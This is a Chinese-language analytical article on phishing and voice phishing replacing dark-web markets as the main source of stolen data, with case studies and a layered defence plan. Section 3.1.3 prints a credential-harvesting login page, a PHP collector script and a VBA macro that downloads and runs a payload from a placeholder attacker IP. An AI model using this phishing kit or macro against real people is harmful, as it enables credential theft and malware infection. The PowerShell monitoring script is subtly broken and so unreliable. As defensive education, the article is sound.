钓鱼攻击取代暗网成为信息窃取主因的成因与防御研究

摘要

依托 Optery 发布的 2026 年企业社会工程学报告及多起全球典型网络安全事件，本文聚焦网络威胁格局的核心转变：传统暗网数据交易模式逐步弱化，钓鱼、语音钓鱼等社会工程学攻击已成为黑客窃取个人与企业敏感信息的首要渠道。报告调研覆盖全球 420 余家各行业网络安全负责人，数据显示仅 4% 的受访企业确信员工个人信息可得到有效防护，96% 的企业对现有防护体系存在明显担忧。当前暗网更多沦为存量泄露数据的流转仓库，攻击者转向通过钓鱼手段直接从受害者手中获取新鲜、可利用的实时数据。本文梳理钓鱼攻击、语音钓鱼的主流攻击形态，结合捷豹路虎、玛莎百货、凯撒宫、米高梅度假村等真实攻击案例，剖析攻击流程、技术实现方式与社工话术逻辑，附邮件解析、恶意脚本、流量检测等代码与配置示例。反网络钓鱼技术专家芦笛结合行业数据指出人为漏洞是此类攻击突破防护的核心节点。文章对比钓鱼攻击与暗网数据交易的运作模式、威胁特征，研判网络威胁演化趋势，从邮件防护、终端管控、身份认证、人员培训、流量审计、应急响应六个维度构建全链路防御体系。全文基于真实调研数据与攻击事件展开分析，论证严谨，方案具备落地性，可为各类企业、机构防范社会工程学类信息窃取攻击提供理论支撑与实践参考。

1 引言

长期以来，暗网地下论坛、非法交易市场是网络黑产流转被盗个人信息、企业涉密数据的核心载体。黑客通过系统漏洞入侵、数据库拖库等方式批量窃取数据后，集中在暗网完成售卖、二次分发与恶意利用，形成 “入侵 - 窃密 - 暗网交易 - 下游犯罪” 的完整黑产链条。在此背景下，企业安全防护的重心多偏向于网络边界防护、数据库加固、漏洞修复以及暗网数据监测，试图从源头阻断数据泄露与流转。

随着全球网络安全基础设施持续完善，防火墙、入侵检测系统、数据库审计、数据脱敏等技术在企业中大范围普及，利用系统高危漏洞实施大规模拖库、入侵的难度不断提升。与此同时，社会工程学攻击凭借低技术门槛、高欺骗性、可绕过传统安全设备的特点快速崛起，其中钓鱼攻击、语音钓鱼攻击发展最为迅猛。Optery 2026 年企业社会工程学报告明确指出，钓鱼及衍生社会工程学攻击已经超越暗网，成为当前窃取个人身份信息、企业机密数据的第一大途径。

本次调研面向跨行业 420 余名网络安全管理者开展，调研结果反映出行业普遍存在的安全短板：仅有 4% 的受访者认为企业能够充分保护员工手机号、家庭住址、家庭成员信息等个人敏感数据，剩余 96% 的受访者均对现有防护能力表示不确定。这一数据直观体现出企业在应对以人为突破口的钓鱼攻击时存在大面积防护盲区。现阶段暗网的功能属性发生明显转变，不再是新鲜数据的主要获取渠道，更多用于存放过往泄露的存量数据，沦为 “数据垃圾场”。黑客不再依赖历史泄露数据开展后续攻击，而是倾向于通过钓鱼手段直接与受害者交互，获取时效性更强、利用价值更高的一手数据。

2025 年多起高知名度企业遭遇钓鱼及语音钓鱼攻击，造成严重经济损失与数据泄露。Scattered Spider、ShinyHunters 等攻击组织针对捷豹路虎实施攻击，非法获取企业敏感信息并引发财务亏损；英国零售巨头玛莎百货遭遇仿冒 IT 人员的语音钓鱼攻击，员工轻信身份并泄露核心信息；凯撒宫、米高梅度假村等头部酒店博彩企业也接连被社会工程学攻击攻破，商业数据大面积暴露。一系列事件印证了钓鱼攻击的现实破坏力，也凸显出单纯依靠技术设备无法抵御利用人性弱点的攻击模式。

本文以 2026 年 Optery 行业调研报告为核心依据，结合近年典型攻击案例，首先分析网络威胁格局转变的核心原因，分类解析钓鱼、语音钓鱼的攻击形态与完整链路，通过代码、配置示例拆解攻击技术细节；其次对比钓鱼攻击与暗网数据交易的模式差异、危害区别；最后结合攻击弱点与企业现存问题，搭建分层防御体系。全文客观分析威胁现状与演化规律，不夸大风险，聚焦技术原理、运作逻辑与落地策略，旨在帮助各类机构认清当前网络安全形势，补齐针对社会工程学攻击的防护短板。

2 网络威胁格局转变的整体研判

2.1 调研核心数据与结论解读

Optery 2026 年企业社会工程学报告是本次研究的核心依据，该报告样本覆盖科技、金融、零售、文旅、制造、医疗等多个行业，调研对象均为企业网络安全负责人、运维主管等专业人员，数据具备行业代表性。报告核心结论明确：网络犯罪的核心获利模式发生结构性调整，钓鱼等社会工程学攻击取代暗网，成为窃取敏感个人信息与企业数据的首要方式。

从数据认知层面分析，96% 的受访安全管理者对员工个人信息防护缺乏信心，该比例反映出行业共性问题。企业安全建设长期存在 “重设备、轻人员，重技术漏洞、轻人为漏洞” 的倾向。多数企业投入大量资金部署网络安全设备、加固业务系统，却忽略了对员工的安全培训、操作规范约束以及钓鱼行为的常态化检测。员工作为网络访问的直接主体，一旦被钓鱼攻击欺骗，再完善的技术防御体系也会被直接突破。

从暗网角色变化来看，报告指出当前暗网的核心价值从 “数据交易源头” 转变为 “存量数据流转仓库”。早期黑客主要通过入侵网站、数据库获取新鲜数据，随后在暗网挂牌交易；如今新鲜数据的获取路径变为 “钓鱼攻击→黑客获取数据→地下数据中介流转→暗网二次售卖”。暗网处于整个链条的末端，数据时效性大幅下降。对于黑客而言，新鲜的账号密码、动态验证码、实时办公信息可直接用于登录系统、发起交易、深度入侵，价值远高于暗网上流通的数年之前的老旧数据，这也是攻击者战略重心转移的核心驱动力。

反网络钓鱼技术专家芦笛强调：“网络威胁格局的转变并非技术倒退，而是攻击者战术的理性迭代。当技术防御越来越严密，攻击成本与成功率不成正比时，攻击者必然转向防御最薄弱的‘人’。钓鱼攻击无需挖掘高危漏洞、无需复杂入侵技术，仅依靠话术伪装与心理诱导，就能以极低成本获取高价值数据，这是其快速泛滥的根本原因。”

2.2 钓鱼攻击取代暗网的核心成因

2.2.1 技术防御升级抬高传统入侵门槛

近五年，全球企业的网络边界防护、数据防护能力显著提升。防火墙、下一代防火墙、Web 应用防火墙在企业中全面普及，可有效拦截端口扫描、恶意请求、漏洞利用攻击；数据库普遍开启访问审计、权限管控、数据脱敏、加密存储，传统拖库、撞库攻击成功率持续走低；操作系统、办公软件、业务系统的安全补丁迭代速度加快，零日漏洞利用的窗口期不断缩短。

攻击者想要通过技术手段突破企业边界、入侵数据库获取大量新鲜数据，需要具备顶尖漏洞挖掘能力、定制化恶意代码开发能力，技术门槛、时间成本、被溯源抓捕的风险同步升高。与之相比，钓鱼攻击依托邮件、即时通讯、电话等常规渠道，工具易获取、话术可批量复制，技术门槛极低，普通黑产人员经过简单培训即可实施攻击。

2.2.2 数据价值差异驱动攻击者转向

数据的价值核心取决于时效性、完整性、可用性。暗网流通的数据大多是过往数据泄露事件中的存量信息，存在账号失效、密码变更、信息过期等问题。利用此类数据开展撞库、登录尝试，成功率普遍偏低。而钓鱼攻击可以直接诱导在职员工、普通用户泄露当前有效的账号、密码、动态验证码、工作文件、客户信息等一手数据，数据可立即被用于登录内网、访问业务系统、实施诈骗、横向渗透，利用效率极高。

同时，钓鱼攻击具备定向性。攻击者可针对特定行业、特定企业、特定岗位定制钓鱼内容，精准获取目标数据；暗网数据属于批量流通，难以精准匹配单一目标的需求。对于定向攻击组织而言，钓鱼攻击的精准度与回报率远高于采购暗网存量数据。

2.2.3 黑产运作模式的迭代优化

传统暗网交易存在匿名沟通、交易信任、资金流转、溯源风险等多重问题。暗网依托匿名网络运行，但各国执法机构对暗网的打击力度持续加大，非法交易平台频繁被关停，交易者面临平台失联、资金被骗、被警方追踪的风险。而钓鱼攻击可采用分层运作模式：前端社工人员负责批量发送钓鱼邮件、拨打钓鱼电话；中端人员负责收集泄露信息；后端人员利用数据实施后续攻击，各环节人员相互隔离，降低整体被一锅端的风险。

此外，钓鱼攻击的规模化能力更强。借助邮件群发工具、改号软件、AI 话术生成工具，单个攻击团队可同时向数百家企业、上万名用户发起攻击，攻击体量远超暗网数据交易。规模化攻击进一步摊薄单条数据的获取成本，提升黑产整体收益。

2.2.4 企业人员防护存在普遍性短板

无论是企业员工还是普通网民，对钓鱼攻击的识别能力普遍不足。职场环境中，员工需要处理大量工作邮件、协作消息、办公来电，难以逐一核实每一条信息的真实性。攻击者模仿企业 IT 部门、管理层、合作方、政务机构等身份发布信息，利用员工的职场习惯、服从心理、紧迫感实施诱导，成功率居高不下。多数企业仅在安全事件发生后开展临时培训，未建立常态化培训、演练、考核机制，人员安全意识长期处于较低水平，为钓鱼攻击提供了可乘之机。

2.3 当前暗网的功能与威胁定位

在钓鱼攻击成为主流之后，暗网并未消失，而是完成了功能转型，现阶段暗网的威胁主要体现在三个方面。第一，存量数据二次流转。过往数据泄露事件中的个人信息、企业数据依旧在暗网反复交易，被用于电信诈骗、身份冒用、精准广告推送等下游犯罪。第二，钓鱼数据的下游分销。攻击者通过钓鱼获取新鲜数据后，一部分自用开展深度攻击，另一部分批量打包投放至暗网，面向全球黑产人员售卖，形成 “钓鱼采集 + 暗网分销” 的组合模式。第三，攻击工具与话术传播。暗网论坛成为钓鱼模板、邮件群发工具、改号软件、社工话术、恶意脚本的分享平台，降低钓鱼攻击的入门门槛，助推攻击规模化扩散。

综合来看，钓鱼攻击是当前数据窃取的上游核心渠道，暗网是数据流转与工具传播的下游载体，二者形成新的黑产协作链条，威胁相互叠加。企业与个人不能因为钓鱼攻击成为主流就忽视暗网监测，需要同时应对上游攻击与下游数据滥用两类风险。

3 主流社会工程学攻击形态与全链路解析

结合报告内容与真实攻击案例，当前用于信息窃取的社会工程学攻击主要分为邮件钓鱼与语音钓鱼（Vishing） 两大核心形态，同时衍生出即时通讯钓鱼、仿冒网站钓鱼等附属形式。本节分类拆解各类攻击的流程、伪装手段、技术细节，并附相关代码、配置、流量示例，清晰还原攻击全链路。

3.1 邮件钓鱼攻击（主流基础形态）

邮件钓鱼是历史最久、应用范围最广的钓鱼攻击方式，也是本次调研中被提及最多的攻击手段。攻击者伪造发件人信息、邮件内容、附件或超链接，诱使用户点击恶意链接、下载运行恶意附件、填写账号密码表单，进而窃取敏感信息。

3.1.1 邮件钓鱼的分类与伪装场景

按照伪装身份与攻击目的，企业场景下的邮件钓鱼分为四类，也是攻击者最常使用的场景：

仿冒企业内部角色：伪装成 IT 运维、行政、财务、部门主管，以系统升级、密码重置、财务对账、考勤统计为由发起攻击，利用员工对内部人员的信任。2025 年玛莎百货附属钓鱼事件中，大量仿冒 IT 运维的钓鱼邮件在企业内部传播，诱导员工点击链接重置密码，进而窃取账号凭证。

仿冒合作方与服务商：伪装成供应商、客户、物流、第三方运维机构，以业务对接、文件传输、合同确认为诱饵，推送恶意附件与链接。

仿冒公共机构：伪装成监管部门、税务、邮政等机构，借助官方身份制造压迫感，逼迫用户配合操作。

广撒网式通用钓鱼：无特定伪装身份，以中奖、福利、账号异常、安全预警为噱头，面向海量用户批量发送。

反网络钓鱼技术专家芦笛指出：定向钓鱼邮件的伪装精细度远高于通用钓鱼，攻击者会提前通过企业官网、社交平台、公开公示收集组织架构、部门名称、员工姓名、常用业务术语，让邮件内容高度贴合企业日常办公场景，肉眼识别难度极大。

3.1.2 完整攻击链路

标准邮件钓鱼攻击分为七个环节，链路闭环且分工明确：

情报收集：爬取企业公开信息、员工社交账号，确定伪装身份、常用称谓、业务场景；

邮件伪造：使用第三方邮件平台、自建邮件服务器伪造发件人名称、发件邮箱，模拟内部邮箱格式；

内容编写：结合场景撰写邮件正文，嵌入恶意 URL、木马附件、表单链接；

批量投递：使用邮件群发工具向目标企业全体员工或特定岗位投递邮件；

受害者操作：员工未核实身份，点击链接、下载附件或在虚假表单中填写账号、密码、验证码；

数据回传：受害者提交的信息自动发送至攻击者控制的服务器；

数据利用：攻击者使用窃取的账号登录内网、业务系统，或打包数据进行二次售卖。

3.1.3 技术细节与代码示例

3.1.3.1 恶意超链接伪装与页面代码

攻击者常使用短链接、域名仿冒、文字伪装等方式隐藏恶意网址，用户点击后跳转至仿冒登录页面。以下是典型仿冒企业 OA 登录页的前端代码，页面样式与官方页面完全一致，用于窃取账号密码：

<!DOCTYPE html>

<html lang="zh-CN">

<head>

   <meta charset="UTF-8">

   <title>企业OA系统 - 登录</title>

   <!-- 样式完全复刻官方OA页面，提升伪装度 -->

   <style>

       body{background:#f5f6f8;text-align:center;padding-top:80px;}

       .login-box{width:400px;margin:0 auto;background:#fff;padding:40px;border-radius:8px;}

       input{width:300px;height:40px;margin:15px 0;padding:0 10px;border:1px solid #ddd;}

       button{width:300px;height:42px;background:#0066cc;color:#fff;border:none;border-radius:4px;cursor:pointer;}

   </style>

</head>

<body>

   <div class="login-box">

       <h2>企业内部OA登录</h2>

       <!-- 恶意表单：数据提交至攻击者服务器 -->

       <form action="http://攻击者IP/collect.php" method="post">

           <input type="text" name="username" placeholder="请输入工号/账号" required>

           <input type="password" name="pwd" placeholder="请输入登录密码" required>

           <input type="text" name="code" placeholder="请输入动态验证码" required>

           <button type="submit">立即登录</button>

       </form>

   </div>

</body>

</html>

后端数据接收脚本collect.php（攻击者服务器端），用于存储窃取的账号密码：

php

运行

<?php

// 获取表单提交的账号、密码、验证码

$user = $_POST['username'];

$pwd = $_POST['pwd'];

$code = $_POST['code'];

// 格式化存储内容

$log = date("Y-m-d H:i:s")." 账号：".$user." 密码：".$pwd." 验证码：".$code.PHP_EOL;

// 写入本地日志文件，留存窃取数据

file_put_contents("user_data.log",$log,FILE_APPEND);

// 跳转回官方OA页面，降低受害者警惕

header("Location: https://oa.正规企业域名.com");

exit;

?>

代码解析：仿冒页面复刻官方样式，欺骗用户输入凭证；表单数据直接提交至攻击者服务器，PHP 脚本接收并持久化存储数据，最后自动跳转至真实官网，短时间内难以被察觉。此类页面无需复杂技术，却是邮件钓鱼中最常用的窃取载体。

3.1.3.2 恶意附件执行脚本

部分钓鱼邮件携带 Excel、Word、压缩包、可执行文件等附件，其中 Office 宏脚本是高频攻击手段。攻击者在 Word 文档中植入恶意宏代码，诱导用户启用宏，执行恶意命令、读取本地文件、外联远控服务器。以下为恶意宏示例：

vba

Sub Auto_Open()

' 文档打开自动执行宏

Dim cmd As String

' 拼接系统命令，下载恶意程序并执行

cmd = "powershell -Command ""(New-Object System.Net.WebClient).DownloadFile('http://攻击者IP/mal.exe','%temp%\mal.exe');Start-Process '%temp%\mal.exe'"""

' 调用命令行执行指令

Shell cmd, vbHide

End Sub

该宏在文档打开后自动调用 PowerShell，从外网下载恶意程序并后台运行，进而窃取本地文件、账号信息。传统邮件网关仅检测附件后缀，难以识别加密文档内的恶意宏，也是宏钓鱼长期活跃的原因。

3.2 语音钓鱼（Vishing）高频攻击形态

语音钓鱼即电话钓鱼，攻击者通过改号软件伪造来电显示，冒充企业 IT、管理层、银行、运维人员等身份，通过实时话术诱导受害者口述账号、密码、验证码，或按照指令执行操作。2025 年米高梅度假村、凯撒宫、玛莎百货等企业的重大数据泄露事件，均以语音钓鱼为主要突破口。

3.2.1 语音钓鱼的核心优势

相较于邮件钓鱼，语音钓鱼的实时交互性更强。攻击者可以根据受害者的语气、疑问实时调整话术，化解质疑；利用人类对语音沟通的信任度高于文字的心理，大幅提升欺骗成功率。同时，改号软件可以伪造企业内部座机、官方客服号码，来电显示与真实号码一致，进一步降低警惕。

3.2.2 典型攻击流程与话术逻辑

以仿冒企业 IT 运维的语音钓鱼（企业最高发场景）为例，完整流程如下：

号码伪造：使用改号工具将来电显示修改为企业 IT 部门座机、内部短号；

身份开场：接通后直接自报身份，“您好，这里是公司 IT 运维中心，目前检测到你的办公终端存在高危漏洞，有数据泄露风险”；

制造紧迫感：强调 “漏洞正在扩散，需立即修复，超时将锁定账号”，迫使受害者来不及核实；

诱导操作：分梯度索要信息，首先询问系统登录密码，随后索要手机动态验证码，部分场景诱导用户远程开启桌面共享、下载工具；

信息利用：获取凭证后立即登录内网、邮箱、业务系统，窃取数据；

收尾掩饰：告知 “修复完成，可以正常使用”，挂断电话，规避后续核查。

针对财务岗位的语音钓鱼会伪装成税务、银行人员，以税务稽查、账户冻结、对公转账异常为由索要账户信息与验证码，针对性极强。

3.2.3 通话流量特征与检测配置

语音钓鱼多依托网络电话、VOIP 线路实现，企业可通过网关设备配置规则，识别异常通话流量。以下为防火墙流量检测规则（基于正则与特征匹配），用于拦截境外 VOIP、改号线路：

plaintext

# 规则1：拦截境外IP发起的VOIP通话（限制非国内区域网络电话接入）

deny ip any 境外IP段 range 10000 65535 log

# 规则2：检测短时间内高频外呼的异常线路（批量语音钓鱼特征）

alert udp any any -> 企业座机网段 5060 (msg:"异常高频VOIP通话，疑似语音钓鱼"; threshold: type both, track dst, count 10, seconds 60; sid:10001;)

# 规则3：拦截常见改号软件、网络电话服务器IP

deny tcp 恶意VOIP服务器IP any log

5060 端口是 SIP 协议默认端口，也是网络电话的核心通信端口。通过限制该端口的异常访问、高频呼叫，可在网络层拦截一部分批量语音钓鱼行为。

3.3 其他衍生钓鱼形态

3.3.1 即时通讯钓鱼

依托企业微信、钉钉、Teams、Slack 等内部协作工具，攻击者盗取或仿冒员工账号，在工作群内发布恶意链接、虚假通知。由于协作工具属于内部沟通场景，员工警惕性极低，攻击扩散速度极快。

3.3.2 二维码钓鱼

邮件、短信中嵌入恶意二维码，扫码后跳转至仿冒登录页、恶意下载页面，移动端用户更容易中招。当前移动端安全软件对二维码的检测能力普遍弱于 PC 端网页。

3.4 钓鱼攻击与暗网数据窃取模式对比

为清晰区分两类威胁的差异，从数据来源、时效性、攻击门槛、溯源难度、防御重点五个维度开展对比分析：

表格

对比维度 钓鱼攻击（当前主流） 暗网数据交易（传统模式）

数据来源 直接与受害者交互，获取一手实时数据 过往入侵、泄露产生的存量数据

数据时效性 极高，账号、凭证均为当前有效 偏低，大量信息过期、失效

技术门槛 低，依赖社工话术，通用工具即可实施 中高，前期需要入侵、拖库技术

溯源难度 中等，可追溯邮件 IP、通话线路、访问日志 高，依托匿名网络，链路复杂

核心防御点 人员意识、邮件 / 通讯管控、身份认证 系统漏洞防护、数据库加固、暗网监测

攻击定向性 强，可针对行业、企业、岗位定制 弱，批量数据随机流通

从对比结果可以看出，钓鱼攻击在实用性、落地成本、定向能力上全面优于传统暗网模式，这也是其成为当前首要信息窃取方式的核心原因。

4 典型企业钓鱼攻击案例深度分析

结合报告中提及的 2025 年多起高价值攻击事件，选取捷豹路虎、玛莎百货、米高梅 & 凯撒度假村三个典型案例，还原攻击过程、分析攻击手段与造成的危害，总结共性攻击规律。

4.1 捷豹路虎钓鱼攻击案例

4.1.1 事件概况

捷豹路虎作为塔塔集团旗下豪华汽车制造商，2025 年遭到 Scattered Spider 与 ShinyHunters 两大知名攻击组织联合发起的钓鱼攻击。攻击者综合使用邮件钓鱼与协作平台钓鱼相结合的方式，入侵企业内部系统，窃取大量商业数据、客户信息与运维资料，直接造成显著财务损失。该攻击属于定向企业级钓鱼，攻击者事前开展长时间情报收集，精准定制攻击内容。

4.1.2 攻击流程拆解

情报摸排：攻击者爬取捷豹路虎官网、招聘平台、行业论坛，梳理组织架构、部门职能、员工常用沟通工具与办公流程；

分层投递：先向行政、运维等外围岗位发送仿冒 IT 运维的钓鱼邮件，再利用窃取的外围账号进入内部协作群，向核心业务人员二次发起攻击；

恶意附件诱导：邮件携带 “系统补丁包”“运维检测工具” 等恶意压缩包，内含可执行程序与脚本；

权限提升：程序运行后建立外联通道，在内网横向移动，逐步渗透至财务、客户管理系统；

数据窃取与变现：批量导出敏感数据，一部分用于对内勒索，一部分投放至暗网分销。

4.1.3 案例总结

该案例体现出分层钓鱼、内网横向渗透的组合攻击思路。外围员工安全意识薄弱成为第一道突破口，一旦单点失守，整个内网都会面临风险。企业仅对外网邮件做防护，未对内网协作平台做管控，形成防护漏洞。

4.2 玛莎百货语音钓鱼案例

4.2.1 事件概况

英国大型零售企业玛莎百货在 2025 年遭遇典型语音钓鱼攻击。攻击者伪造企业 IT 部门号码致电员工，谎称系统存在故障，诱导员工泄露登录凭证。部分员工轻信话术，导致多个业务系统账号被窃取，门店运营数据、客户信息遭到泄露，企业被迫暂停部分线上服务。

4.2.2 核心攻击特点

本次攻击的核心伪装身份为内部 IT 支持，话术贴合零售企业日常系统运维场景。攻击者利用零售行业员工轮班、人员流动性大、内部沟通频繁的特点，降低身份核实概率。同时攻击者分批拨打不同门店、不同部门的员工电话，扩大攻击范围。事件暴露企业缺少统一的电话核验机制，员工接到陌生运维来电时，无标准流程进行身份确认。

4.3 米高梅与凯撒宫社会工程学攻击案例

4.3.1 事件概况

米高梅度假村、凯撒宫是全球知名酒店博彩企业，客户数据、会员信息、财务数据价值极高。攻击者以语音钓鱼为入口，伪装成内部员工致电 IT 服务台，仅用时十分钟就骗取登录凭证，成功入侵内网。攻击导致赌场老虎机、入住系统、ATM 机瘫痪，米高梅预估损失高达上亿美元；凯撒宫为避免数据公开，向攻击者支付巨额赎金。

4.3.2 关键漏洞分析

服务台人员核验流程缺失：IT 服务台作为企业权限核心，未严格核实来电人员身份，仅凭对方口述就提供账号权限；

权限管控松散：服务台账号具备内网大范围访问权限，一旦泄露造成全域影响；

应急响应滞后：系统瘫痪后未能第一时间断网、封禁账号，导致损失持续扩大。

4.4 案例共性规律总结

综合以上多起案例，当前针对大型企业的钓鱼攻击具备四大共性：第一，事前深度情报收集，攻击内容高度贴合企业场景，伪装度极高；第二，多渠道组合攻击，邮件、语音、即时通讯相互配合，单点突破后多层扩散；第三，优先突破外围岗位，利用行政、运维、前台等人员作为跳板，向内网核心区域渗透；第四，攻击附带勒索属性，窃取数据后以公开信息为要挟索要赎金，形成 “钓鱼 - 窃密 - 勒索” 完整链条。

反网络钓鱼技术专家芦笛总结：“大型企业部门多、人员基数大，很难做到全员安全意识达标，这是攻击者紧盯大型企业的原因。而中小企业往往安全设备不足、制度缺失，同样是钓鱼攻击的重灾区。无论企业规模，‘人员 + 流程 + 技术’三位一体的防护体系都是抵御钓鱼攻击的关键。”

5 钓鱼攻击盛行下的企业全维度防御体系

结合 Optery 报告数据、攻击链路、典型案例以及各类攻击的技术弱点，本节从邮件与通讯防护、语音通话管控、终端安全加固、身份认证体系、人员安全培训、应急响应机制六个维度，搭建可落地的全链路防御体系，兼顾大型企业与中小微企业的成本与运维需求。

5.1 邮件与即时通讯平台专项防护

邮件是钓鱼攻击最主要的入口，需从过滤、检测、管控、审计四个层面加固。

多层邮件网关过滤

部署专业邮件安全网关，开启恶意链接检测、恶意附件查杀、发件人信誉研判、仿冒发件人拦截四大功能。针对宏文件、可执行文件、加密压缩包做重点拦截，默认禁止外部邮件携带 Office 宏附件。使用如下正则规则拦截典型钓鱼关键词，网关规则示例：

plaintext

# 拦截邮件正文/标题中的高危钓鱼关键词（密码重置、系统故障、验证码索要等）

Regex: (密码重置|系统漏洞|账号锁定|立即验证|动态验证码|账户异常)

Action: 标记告警 + 隔离邮件

同时拦截境外陌生发件域名、短期注册域名、相似度极高的仿冒邮箱。

发件人身份强制核验

开启内部邮件域名保护，禁止外部服务器伪造企业内部邮箱后缀；对于外部合作方邮件，建立白名单，非白名单发件人邮件强制弹窗提醒 “外部邮件，谨慎点击”。

内部协作平台管控

钉钉、企业微信、Teams 等工具关闭外部人员临时入群权限；群内禁止随意发布外部链接、陌生附件，开启链接安全跳转，所有外部链接先经过沙箱检测再访问。定期审计群聊记录，识别异常账号与发言。

邮件审计与溯源

完整记录所有邮件的发件 IP、收件人、附件、链接访问记录，出现钓鱼事件后可快速溯源，定位传播路径。

5.2 语音通话与 VOIP 管控（抵御语音钓鱼）

针对语音钓鱼与改号来电，从号码、线路、流程三方面防护。

号码与线路管控

企业座机、VOIP 网关开启来电溯源功能，拦截境外 IP、匿名 VOIP 线路、高频呼叫号码；屏蔽已知恶意改号服务器 IP。内部 IT、财务等核心部门座机，仅允许内部短号与备案合作方号码呼入。

建立电话核验标准流程

明文规定全体员工：接到索要账号、密码、验证码、远程协助的陌生来电，一律当场挂断，通过企业内部固定专线、线下当面核实身份，严禁电话中透露任何敏感信息。针对 IT 服务台、前台等高风险岗位，制定双人核验制度，不仅凭来电口述提供权限。

通话记录留存

所有办公通话、服务台通话开启录音留存，留存时长不低于 90 天，用于事后溯源与事件复盘。

5.3 终端安全加固（阻断恶意代码执行）

终端是钓鱼攻击的最终落地节点，链接点击、附件运行均发生在终端，需做精细化管控。

浏览器与网页防护

终端浏览器部署安全插件，拦截仿冒网站、恶意二维码、钓鱼页面；开启网址栏域名高亮功能，帮助用户识别仿冒域名。禁用浏览器自动保存密码功能，即使页面被攻破，凭证也不会被自动读取。

Office 宏与脚本管控

通过组策略全域禁用 Office 文档宏自动执行，手动启用宏增加二次确认弹窗；限制终端 PowerShell、VBS、批处理脚本的运行权限，普通员工账户无法执行未知脚本。组策略配置项：禁止 Office 启用所有非可信位置的宏。

终端进程与外联监控

终端安全软件实时监控陌生进程、异常外网连接。针对从临时目录、下载目录启动的未知程序自动拦截，并上报告警。以下为终端异常外联检测简易脚本（PowerShell），用于巡检恶意外联：

powershell

# 查看所有外网连接，筛选陌生IP与高危端口

$connections = Get-NetTCPConnection | Where-Object {$RemoteAddress -notlike "192.168.*" -and $RemoteAddress -notlike "10.*"}

foreach($conn in $connections){

   Write-Host "本地端口："$conn.LocalPort " 外网地址："$conn.RemoteAddress " 状态："$conn.State

   # 拦截高危远控端口外联

   if($conn.RemotePort -in 3389,4444,5173){

       taskkill /F /PID $conn.OwningProcess

       Write-Host "已拦截高危外联进程，PID："$conn.OwningProcess

   }

}

该脚本可定期执行，主动发现并阻断远控类恶意外联行为。

权限最小化

员工日常使用普通终端账户，本地管理员权限由 IT 部门统一管控，普通用户无法安装软件、修改系统配置，即使误运行恶意程序，也难以获取高权限。

5.4 身份认证体系升级（核心防线）

单一账号密码是钓鱼攻击的主要窃取目标，升级认证体系可大幅降低凭证泄露后的风险。

全域开启多因素认证（MFA）

企业邮箱、OA、内网系统、财务系统、运维平台全部开启账号密码 + 动态验证码 / 硬件令牌双因素认证。即使账号密码被钓鱼窃取，攻击者没有动态验证码，依旧无法登录系统。这是抵御凭证类钓鱼攻击最有效的技术手段。

密码策略强化

强制员工定期修改密码，禁止弱密码、通用密码；密码复杂度设置为字母 + 数字 + 特殊符号组合。禁止多个平台共用同一套密码，避免一处泄露、全域沦陷。

异常登录告警

搭建登录审计系统，针对异地登录、陌生设备登录、高频登录尝试实时弹窗告警，并临时冻结账号，由管理员人工核实后解封。

5.5 员工安全意识培训与常态化演练

技术设备存在局限性，人的意识才是第一道防线，企业需建立常态化培训与演练机制。

场景化专项培训

摒弃泛泛的安全宣讲，围绕邮件钓鱼、语音钓鱼、二维码钓鱼、仿冒 IT 人员等高频场景开展培训，结合企业自身遭遇的事件、行业典型案例讲解攻击话术与识别方法。针对财务、前台、IT 服务台等高风险岗位开展一对一重点培训。

常态化模拟演练

定期发起模拟钓鱼邮件、模拟钓鱼电话演练，不提前通知员工，统计上钩率。针对上钩员工开展二次专项培训，将演练结果纳入岗位绩效考核，倒逼员工重视安全。

建立安全上报渠道

设立简易的钓鱼信息上报入口，员工收到可疑邮件、来电、消息后，可一键上报至安全部门，安全团队第一时间研判并全域预警。

5.6 应急响应与事后处置机制

完善的应急体系可以在钓鱼攻击发生后快速止损，缩小损失范围。

应急触发流程

一旦发现钓鱼事件、数据泄露，第一执行三步操作：受感染终端断网、泄露账号全域封禁、可疑邮件全域隔离，阻止攻击进一步扩散。

分级处置方案

单人员中招：封禁账号，修改全平台密码，终端全盘查杀，开展个人再培训；

部门级扩散：临时冻结部门系统权限，排查所有终端，溯源攻击传播路径；

全域攻击：启动公司级应急预案，联动法务、公关、IT、行政，必要时上报监管机构与公安部门。

事后复盘与优化

事件处置完成后，全面复盘攻击入口、漏洞所在（技术漏洞 / 人员漏洞），针对性优化邮件规则、电话策略、培训内容，避免同类攻击重复发生。

5.7 暗网监测补充防护

虽然钓鱼是主要攻击渠道，但仍需配套暗网监测服务。定期监测暗网论坛、交易平台，检索企业员工信息、商业数据、内部文档，一旦发现本企业数据被售卖，第一时间采取溯源、下架、报警等措施，应对下游数据滥用风险。

6 网络威胁演化趋势与长期防护思考

6.1 短期演化趋势

结合当前攻击技术与黑产运作模式，未来 1-2 年钓鱼类社会工程学攻击将呈现三大演化方向。第一，AI 深度赋能钓鱼。利用生成式 AI 批量定制个性化钓鱼邮件、语音话术、深度伪造语音 / 视频，伪装逼真度进一步提升，传统关键词检测规则逐步失效。第二，攻击渠道向移动端转移。手机短信、社交 APP、短视频私信将成为新的钓鱼主战场，移动端防护短板会被持续利用。第三，钓鱼 + 勒索组合常态化，攻击者不再单纯窃取数据，而是将数据泄露作为要挟，直接向企业索要赎金，攻击变现链条更短。

6.2 长期防护核心思考

Optery 报告中 96% 企业的防护焦虑，本质反映出传统 “以技术对抗技术” 的安全思路已经无法适配以人为突破口的社会工程学攻击。网络安全防护的重心，必须从单纯的设备部署转向 “人机协同防护”。

首先，制度是基础。企业需要建立完整的安全操作规范，明确邮件处理、来电核验、外部文件使用、账号管理等全流程规则，让员工有章可循，减少人为失误。其次，技术是支撑。邮件网关、终端安全、多因素认证、流量审计等技术设备需要持续迭代，紧跟攻击手段变化，封堵技术层面的漏洞。最后，人员是核心。常态化的培训、演练、考核必须长期坚持，安全意识不能一蹴而就，需要持续强化。

对于行业整体而言，网络安全厂商需要针对 AI 钓鱼、深度伪造等新型威胁研发检测技术；监管机构需加大对钓鱼、改号软件、暗网交易的打击力度，从源头压缩黑产生存空间；企业与员工需要形成安全共识，摒弃 “安全只是 IT 部门工作” 的错误认知，实现全员参与防护。

钓鱼攻击取代暗网成为信息窃取主渠道，不是网络威胁的倒退，而是攻击思维的进化。攻击者找到了当前安全体系中最薄弱的环节，而防御方也必须同步调整思路，构建适配新型威胁的防护体系。网络安全没有一劳永逸的解决方案，唯有持续跟踪威胁变化、动态优化防护策略、坚持技术与人防并重，才能有效抵御不断演化的社会工程学攻击。

7 结语

